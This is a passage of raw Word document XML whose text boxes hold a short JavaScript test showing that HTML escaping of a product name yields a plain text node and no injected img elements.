                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                      <wps:wsp>
                        <wps:cNvPr id="850" name="Rectangle 850"/>
                        <wps:cNvSpPr/>
                        <wps:spPr>
                          <a:xfrm>
                            <a:off x="100757" y="926551"/>
                            <a:ext cx="5070555" cy="130914"/>
                          </a:xfrm>
                          <a:prstGeom prst="rect">
                            <a:avLst/>
                          </a:prstGeom>
                          <a:ln>
                            <a:noFill/>
                          </a:ln>
                        </wps:spPr>
                        <wps:txbx>
                          <w:txbxContent>
                            <w:p w14:paraId="06479CA6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                              <w:pPr>
                                <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                                <w:ind w:left="0" w:firstLine="0"/>
                              </w:pPr>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>expect(</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>host.querySelector</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>(</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>".product</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>-name"</w:t>
                              </w:r>
                              <w:proofErr w:type="gramStart"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>).textContent).toBe</w:t>
                              </w:r>
                              <w:proofErr w:type="gramEnd"/>
                              <w:r>
                                <w:rPr>
                                  <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                                  <w:color w:val="EFF7FF"/>
                                  <w:sz w:val="16"/>
                                </w:rPr>
                                <w:t>(payload);</w:t>
                              </w:r>
                            </w:p>
                          </w:txbxContent>
                        </wps:txbx>
                        <wps:bodyPr horzOverflow="overflow" vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0">
                          <a:noAutofit/>
                        </wps:bodyPr>
                      </wps:wsp>
                    </wpg:wgp>
                  </a:graphicData>
                </a:graphic>
              </wp:inline>
            </w:drawing>
          </mc:Choice>
          <mc:Fallback>
            <w:pict>
              <v:group w14:anchorId="4F7EBF00" id="Group 25895" o:spid="_x0000_s1214" style="width:510.25pt;height:90.75pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64801,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&#10;">
                <v:shape id="Shape 834" o:spid="_x0000_s1215" style="position:absolute;top:2667;width:64801;height:8858;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="6480126,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rBZwgAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvgv8hPMGbpq4ipRpFBaF4Wt0Vr4/mbVO2eSlNVtt/vxEEj8PMfMOst52txZ1aXzlWMJsmIIgL&#10;pysuFXx/HScpCB+QNdaOSUFPHrab4WCNmXYPPtP9EkoRIewzVGBCaDIpfWHIop+6hjh6P661GKJs&#10;S6lbfES4reVHkiylxYrjgsGGDoaK38ufVbCsTN7nn6fu0F/xtk/5Wi54ptR41O1WIAJ14R1+tXOt&#10;IJ0v4HkmHgG5+QcAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQCsErBZwgAAANwAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" path="m19050,l6467474,v2527,,4956,484,7290,1445l6480126,5028r,875762l6474764,884368v-2334,967,-4763,1451,-7290,1457l19050,885825v-2526,-6,-4956,-490,-7290,-1457c9426,883400,7366,882024,5580,880244,3793,878452,2417,876393,1450,874061l,866775,,19050,1450,11751c2417,9416,3793,7358,5580,5575,7366,3789,9426,2412,11760,1445,14094,484,16524,,19050,xe" fillcolor="#102b46" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6480126,885825"/>
                </v:shape>
                <v:rect id="Rectangle 842" o:spid="_x0000_s1216" style="position:absolute;top:183;width:1438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00B7B351" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t xml:space="preserve">text node and zero </w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 843" o:spid="_x0000_s1217" style="position:absolute;left:10858;width:3429;height:1428;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="342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HRVwwAAANwAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8gq9FN1Yaw3RVaQSyLVaPD+yz2Rp9m3Ibs3233cFweMwM98wm120nbjS4I1jBfNZBoK4&#10;dtpwo+D7VE5zED4ga+wck4I/8rDbTp42WGg38hddj6ERCcK+QAVtCH0hpa9bsuhnridO3sUNFkOS&#10;QyP1gGOC206+ZdmHtGg4LbTY02dL9c/x1yo4L0O5NLGqTVwddPVa7g/5eVTq5Tnu1yACxfAI39uV&#10;VpC/L+B2Jh0Buf0HAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA1th0VcMAAADcAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" path="m9525,l333375,v2630,,4875,930,6735,2791c341970,4651,342900,6896,342900,9525r,123825c342900,135976,341970,138218,340110,140078v-1860,1861,-4105,2791,-6735,2797l9525,142875v-2630,-6,-4875,-936,-6735,-2797c930,138218,,135976,,133350l,9525c,6896,930,4651,2790,2791,4650,930,6895,,9525,xe" fillcolor="#edf2f6" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,342900,142875"/>
                </v:shape>
                <v:rect id="Rectangle 25463" o:spid="_x0000_s1218" style="position:absolute;left:11084;top:236;width:77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D5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np/kM/u+EKyDXfwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQAboSD5yAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="5FAC34F8" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>&lt;</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25468" o:spid="_x0000_s1219" style="position:absolute;left:11667;top:236;width:2326;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KIwwAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/LisIw&#10;FN0L/kO4gjtNFRXtGEV8oEtHBZ3dpbnTlmluShNt9evNQpjl4bzny8YU4kGVyy0rGPQjEMSJ1Tmn&#10;Ci7nXW8KwnlkjYVlUvAkB8tFuzXHWNuav+lx8qkIIexiVJB5X8ZSuiQjg65vS+LA/drKoA+wSqWu&#10;sA7hppDDKJpIgzmHhgxLWmeU/J3uRsF+Wq5uB/uq02L7s78er7PNeeaV6naa1RcIT43/F3/cB61g&#10;OB5Nwt5wJ1wBuXgDAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAFQWyiMMAAADeAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="77030AF9" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>img</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 25467" o:spid="_x0000_s1220" style="position:absolute;left:13416;top:236;width:77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b6yAAAAN4AAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ba8JA&#10;FITvBf/D8oTe6qZi1URXkaroUWMh9fbIviah2bchuzVpf323UPA4zMw3zHLdm1rcqHWVZQXPowgE&#10;cW51xYWCt8v+aQ7CeWSNtWVS8E0O1qvBwxITbTs+0y31hQgQdgkqKL1vEildXpJBN7INcfA+bGvQ&#10;B9kWUrfYBbip5TiKptJgxWGhxIZeS8o/0y+j4DBvNu9H+9MV9e56yE5ZvL3EXqnHYb9ZgPDU+3v4&#10;v33UCsYvk+kM/u6EKyBXvwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAA&#10;AAAAAAAAAAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUB&#10;AAALAAAAAAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQBkmib6yAAAAN4A&#10;AAAPAAAAAAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA/AIAAAAA&#10;" filled="f" stroked="f">
                  <v:textbox inset="0,0,0,0">
                    <w:txbxContent>
                      <w:p w14:paraId="1823A563" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                            <w:sz w:val="17"/>
                          </w:rPr>
                          <w:t>&gt;</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 845" o:spid="_x0000_s1221" style="position:absolute;left:14269;top:183;width:7282;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6DF987EA" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="0B2D56"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> elements</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 846" o:spid="_x0000_s1222" style="position:absolute;left:19745;top:183;width:35532;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65629AEC" w14:textId="4F7A1AED" w:rsidR="00345BB3" w:rsidRPr="00C73B1A" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r>
                          <w:t xml:space="preserve"> </w:t>
                        </w:r>
                        <w:r w:rsidR="00C73B1A">
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t xml:space="preserve">: </w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t>a structural</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r w:rsidRPr="00C73B1A">
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> proof rather than a substring check:</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 847" o:spid="_x0000_s1223" style="position:absolute;left:1007;top:4122;width:2752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715ACDA6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>expect(escaped</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>).</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>not</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>.</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>toMatch</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&lt;&gt;"']/);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 848" o:spid="_x0000_s1224" style="position:absolute;left:1007;top:5836;width:4491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003AD3A" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>host.innerHTML</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t xml:space="preserve"> = `&lt;div class="product-name"&gt;${escaped}&lt;/div&gt;`;</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 849" o:spid="_x0000_s1225" style="position:absolute;left:1007;top:7551;width:3839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7B359736" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>expect(</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>host.querySelectorAll</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>("</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>img</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>")</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>).</w:t>
                        </w:r>
                        <w:proofErr w:type="spellStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>toHaveLength</w:t>
                        </w:r>
                        <w:proofErr w:type="spellEnd"/>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>(0);</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="Rectangle 850" o:spid="_x0000_s1226" style="position:absolute;left:1007;top:9265;width:5070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06479CA6" w14:textId="77777777" w:rsidR="00345BB3" w:rsidRDefault="008125F0">
                        <w:pPr>
                          <w:spacing w:after="160" w:line="259" w:lineRule="auto"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>expect(</w:t>
                        </w:r>
                        <w:proofErr w:type="gramStart"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
                          <w:t>host.querySelector</w:t>
                        </w:r>
                        <w:proofErr w:type="gramEnd"/>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Consolas" w:eastAsia="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
                            <w:color w:val="EFF7FF"/>
                            <w:sz w:val="16"/>
                          </w:rPr>
